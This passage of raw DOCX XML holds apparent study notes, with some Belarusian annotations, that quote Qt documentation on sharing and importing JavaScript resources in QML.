          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that multiple QML documents can import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"factorial.js"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and call the factorial and factorialCallCount functions that it provides. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The state of the JavaScript import is shared</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>across the QML documents which import it</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and thus the return value of the factorialCallCount function may be non-zero when called within a QML document which never calls the factorial function.</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Важная заўвага!!! Гэта глабальна падзяляльны код!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7B46" w:rsidRPr="00D815C8" w:rsidRDefault="007D7B46" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As they are shared, .pragma library files cannot access QML component instance objects or properties directly, although QML values can be passed as function parameters.</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Доступ да кмл аб’ектаў у бібліятэк</w:t>
      </w:r>
      <w:r w:rsidR="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>ах</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> закрыты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7B46" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>javascript</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>imports</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="007D7B46" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007D7B46" w:rsidRPr="00D815C8" w:rsidRDefault="007D7B46" w:rsidP="008F15ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc483000536"/>
      <w:bookmarkStart w:id="80" w:name="_Toc483603896"/>
      <w:bookmarkStart w:id="81" w:name="_Toc483605116"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Importing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:bookmarkStart w:id="82" w:name="_Toc382058570"/>
    <w:p w:rsidR="00DE54A7" w:rsidRPr="00D815C8" w:rsidRDefault="00947354" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://doc.qt.io/qt-5/qtqml-javascript-resources.html" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="17A81A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may be imported by QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other JavaScript resources. JavaScript resources may be imported </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>via either relative or absolute URLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE54A7" w:rsidRPr="00D815C8" w:rsidRDefault="002F0352" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the case of a relative URL, the location is resolved </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relative to the location of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML document</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Resource</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 xml:space="preserve">that contains the import. If the script file is not accessible, an error will occur. If the JavaScript needs to be fetched from a network resource, the </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component's</w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:anchor="status-prop" w:history="1">
        <w:r w:rsidRPr="008F15ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>status</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is set to "Loading"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> until the script has been downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE54A7" w:rsidRPr="00D815C8" w:rsidRDefault="004C49D7" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript resources may also import QML modules and other JavaScript resources.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The syntax of an import statement within a JavaScript resource differs slightly from an import statement within a QML document, which is documented thoroughly below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C49D7" w:rsidRPr="00D815C8" w:rsidRDefault="004C49D7" w:rsidP="008F15ED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc483000537"/>
      <w:bookmarkStart w:id="84" w:name="_Toc483603897"/>
      <w:bookmarkStart w:id="85" w:name="_Toc483605117"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Importing a JavaScript Resource from a QML Document</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="004C49D7" w:rsidRPr="00D815C8" w:rsidRDefault="004C49D7" w:rsidP="004C49D7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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 xml:space="preserve">A QML document may import a JavaScript resource with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
